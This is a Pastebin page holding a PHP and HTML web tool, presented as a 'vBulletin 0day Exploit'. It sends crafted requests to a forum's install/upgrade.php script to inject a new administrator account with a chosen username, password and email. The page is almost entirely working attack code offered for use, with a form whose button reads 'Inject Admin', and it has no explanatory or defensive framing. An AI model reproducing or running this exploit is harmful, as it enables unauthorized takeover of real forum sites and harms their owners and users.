Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!DOCTYPE HTML>
- <html>
- <title>vBulletin 0day Exploit!</title>
- <body bgcolor=#000000>
- <center>
- <pre><font color=#ffffff><link href='http://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700' rel='stylesheet' type='text/css'>
- <font face="Ubuntu Mono" size="5" color="#ffffff">vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit</font><br>
- <a href="https://www.facebook.com/gzinflate/" target="_blank">Me!</a>
- <br>
- <?php
- //extract data from the post
- if(isset($_POST['submit'])){
- extract($_POST);
- //set POST variables
- $url = $_POST['url'];
- $fields = array(
- 'ajax' => urlencode('1'),
- 'version' => urlencode('install'),
- 'checktable' => urlencode('false'),
- 'firstrun' => urlencode('false'),
- 'step' => urlencode('7'),
- 'startat' => urlencode('0'),
- 'only' => urlencode('false'),
- 'customerid' => urlencode($_POST['customerid']),
- 'options[skiptemplatemerge]' => urlencode('0'),
- 'response' => urlencode('yes'),
- 'htmlsubmit' => urlencode('1'),
- 'htmldata[username]' => urlencode($_POST['username']),
- 'htmldata[password]' => urlencode($_POST['password']),
- 'htmldata[confirmpassword]' => urlencode($_POST['password']),
- 'htmldata[email]' => urlencode($_POST['email'])
- );
- //url-ify the data for the POST
- foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
- rtrim($fields_string, '&');
- //open connection
- $ch = curl_init();
- //set the url, number of POST vars, POST data
- curl_setopt($ch,CURLOPT_URL, $url);
- curl_setopt($ch,CURLOPT_POST, count($fields));
- curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
- curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
- curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
- //execute post
- $result = curl_exec($ch);
- //close connection
- curl_close($ch);
- exit();
- }
- ?>
- <center>
- <form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
- <span>Example: http://localhost/path/install/upgrade.php</span><br>
- <span>Website:</span><input name="url" type="text" tabindex="1" size="60" />
- <br><span>Customer ID:</span><input name="customerid" type="text" tabindex="2" size="40" />
- <br><span>Username:</span><input name="username" type="text" tabindex="3" size="40" />
- <br><span>Password:</span><input name="password" type="text" tabindex="4" size="40" />
- <br><span>Email:</span><input name="email" type="text" tabindex="5" maxlength="40" />
- <input name="submit" type="submit" value="Inject Admin">
- </form>
- </center>
- </pre>
- </font>
- </html>
Add Comment
Please, Sign In to add comment